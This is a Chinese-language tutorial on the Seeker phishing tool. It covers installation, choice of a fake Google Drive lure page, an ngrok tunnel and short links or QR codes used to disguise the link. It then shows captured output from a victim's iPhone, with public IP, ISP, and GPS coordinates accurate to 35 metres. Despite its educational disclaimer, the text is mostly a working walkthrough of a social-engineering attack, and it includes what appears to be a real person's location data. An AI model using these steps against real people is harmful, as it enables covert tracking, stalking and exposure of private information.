前言:此工具纯粹只是一个概念证明(PoC),仅用于网络安全教育目的。其主要目的是告诉大家不要轻易点击来路不明的链接并授予关键权限,否则你将可能暴露你的设备信息甚至你的位置等。
一、原理介绍:Seeker作为一款高精度地理位置跟踪工具,同时也是社交工程学(社会工程学)爱好者们手中的一款利器,https://github.com/thewhiteh4t/seeker,Seeker拥有自己的php服务端,搭配ngrok代理工具的穿透技术可以让我们被动收集到他人的信息。
前期版本可参考一条链接即可让黑客跟踪你的位置 | Seeker工具使用_rYu1nser的博客-CSDN博客
二、测试版本及时间
seeker 1.2.8版本
ngrok 3.2.2版本
2023年3月26日
三、基本配置
#初始配置
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod +x install.sh
./install.sh
#可选,修改默认界面index.html
┌──(kali㉿kali)-[~/seeker/template/gdrive]
└─$ ll
total 32
drwxr-xr-x 2 kali kali 4096 Apr 25 03:01 css
-rw-r--r-- 1 kali kali 46 Apr 25 03:01 error_handler.php
drwxr-xr-x 2 kali kali 4096 Apr 25 03:01 fonts
drwxr-xr-x 2 kali kali 4096 Apr 25 03:01 images
-rw-r--r-- 1 kali kali 1657 Apr 25 03:01 index.html
-rw-r--r-- 1 kali kali 44 Apr 25 03:01 info_handler.php
drwxr-xr-x 2 kali kali 4096 Apr 25 03:01 js
-rw-r--r-- 1 kali kali 46 Apr 25 03:01 result_handler.php
#运行测试
python3 seeker.py
[>] Created By : thewhiteh4t
|---> Twitter : https://twitter.com/thewhiteh4t
|---> Community : https://twc1rcle.com/
[>] Version : 1.2.8
[!] Select a Template :
[0] NearYou
[1] Google Drive
[2] WhatsApp
[3] WhatsApp Redirect
[4] Telegram
[5] Zoom
[6] Google ReCaptcha
[7] Custom Link Preview
#选择模块1,填入跳转链接:http://www.baidu.com
[>] 1
[+] Loading Google Drive Template...
[+] Enter GDrive File URL : http://www.baidu.com
[+] Port : 8080
[+] Starting PHP Server...[ ✔ ]
[+] Waiting for Client...[ctrl+c to exit]
#ngrok配置
#下载linux版本并解压
在 Linux 或 Mac OS X 上,您可以使用以下命令从终端解压缩 ngrok。在Windows上,只需双击ngrok.zip即可提取它。
sudo unzip /path/to/ngrok.zip
或sudo tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /home/kali/Downloads
或图形化界面右键解压
#注册ngrok,添加身份验证令牌到默认配置中,https://ngrok.com/download,#xxxxxxxxxxxxxxxxxxxxxxxxxxxx替换为所申请的令牌
ngrok config add-authtoken xxxxxxxxxxxxxxxxxxxxxxxxxxxx
#使用运行
ngrok help
#要启动转发到本地端口 8080 的 HTTP 隧道,请运行以下命令
ngrok http 8080
#可选:关闭ERR_NGROK_6024浏览器警告界面
#ngrok 3.0之后的版本中,ngrok-skip-browser-warning参数已被移除,因此无法在ngrok 3.2.2版本中使用该参数来跳过浏览器警告
#ngrok http 8080 --response-header-add ngrok-skip-browser-warning=true
#也可使用frp配置内网穿透,需要公网地址https://cloud.tencent.com/developer/article/1837482
#使用ngrok生成互联网链接,可分享在互联网上,服务停止后链接失效,每次运行重新生成
https://72b2-58-56-150-42.ngrok-free.app
#使用https://sina.lt/生成个短网址,便于隐藏,效果不太好,总被提示非法界面
https://t.hk.uy/b2xY
#推荐使用草料二维码,直接生成二维码分享
https://cli.im/text
#点击链接后效果#########################################
[!] Device Information :
[+] OS : CPU iPhone OS 16_4_1 like Mac OS X
[+] Platform : iPhone
[+] CPU Cores : 4
[+] RAM : Not Available
[+] GPU Vendor : Apple Inc.
[+] GPU : Apple GPU
[+] Resolution : 390x844
[+] Browser : Not Available
[+] Public IP : 221.215.103.62
[!] IP Information :
[+] Continent : Asia
[+] Country : China
[+] Region : Shandong
[+] City : Qingdao
[+] Org : China Unicom Shandong province network
[+] ISP : CHINA UNICOM China169 Backbone
[!] Location Information :
[+] Latitude : 36.35759909107096 deg
[+] Longitude : 120.08560071644327 deg
[+] Accuracy : 35 m
[+] Altitude : 19.932793378829956 m
[+] Direction : Not Available
[+] Speed : Not Available
[+] Google Maps : https://www.google.com/maps/place/36.35759909107096+120.08560071644327
[+] Data Saved : /home/kali/seeker/db/results.csv
[+] Waiting for Client...[ctrl+c to exit]
ngrok常用命令:
TERMS OF SERVICE: https://ngrok.com/tos
EXAMPLES:
ngrok http 8080 # forward ngrok subdomain to port 80
ngrok http example.com:9000 # forward traffic to example.com:9000
ngrok http --domain=bar.ngrok.dev 80 # request subdomain name: 'bar.ngrok.dev'
ngrok http --domain=example.com 1234 # request tunnel 'example.com' (DNS CNAME)
ngrok http --basic-auth='falken:joshua' 80 # enforce basic auth on tunnel endpoint
ngrok http --host-header=example.com 80 # rewrite the Host header to 'example.com'
ngrok http file:///var/log # serve local files in /var/log
ngrok http https://localhost:8443 # forward to a local https server
OPTIONS:
--authtoken string ngrok.com authtoken identifying a user
--basic-auth strings enforce basic auth on tunnel endpoint, 'user:password'
--cidr-allow strings reject connections that do not match the given CIDRs
--cidr-deny strings reject connections that match the given CIDRs
--circuit-breaker float reject requests when 5XX responses exceed this ratio
--compression gzip compress http responses from your web service
--config strings path to config files; they are merged if multiple
--domain string host tunnel on a custom subdomain or hostname (requires DNS CNAME)
-h, --help help for http
--host-header string set Host header; if 'rewrite' use local address hostname
--inspect enable/disable http introspection (default true)
--log string path to log file, 'stdout', 'stderr' or 'false' (default "false")
--log-format string log record format: 'term', 'logfmt', 'json' (default "term")
--log-level string logging level: 'debug', 'info', 'warn', 'error', 'crit' (default "info")
--mutual-tls-cas string path to TLS certificate authority to verify client certs in mutual tls
--oauth string enforce authentication oauth provider on tunnel endpoint, e.g. 'google'
--oauth-allow-domain strings allow only oauth users with these email domains
--oauth-allow-email strings allow only oauth users with these emails
--oauth-client-id string oauth app client id, optional
--oauth-client-secret string oauth app client secret, optional
--oauth-scope strings request these oauth scopes when users authenticate
--oidc string oidc issuer url, e.g. https://accounts.google.com
--oidc-client-id string oidc app client id
--oidc-client-secret string oidc app client secret
--oidc-scope strings request these oidc scopes when users authenticate
--proxy-proto string version of proxy proto to use with this tunnel, empty if not using
--region string ngrok server region [us, eu, au, ap, sa, jp, in] (default "us")
--request-header-add strings header key:value to add to request
--request-header-remove strings header field to remove from request if present
--response-header-add strings header key:value to add to response
--response-header-remove strings header field to remove from response if present
--scheme strings which schemes to listen on (default [https])
--verify-webhook string validate webhooks are signed by this provider, e.g. 'slack'
--verify-webhook-secret string secret used by provider to sign webhooks, if any
--websocket-tcp-converter convert ingress websocket connections to TCP upstream
注册:
运行:
数据回传显示,左侧为seeker,右侧为ngrok:
其他:
转成短网址:
转换为二维码:
定位效果,基于手机信号基站较为准确,pc端测试会有较大误差:
总结:不要点击任何不确认来源用途的链接,不扫描不明来源用途的二维码,保护好个人信息财产安全。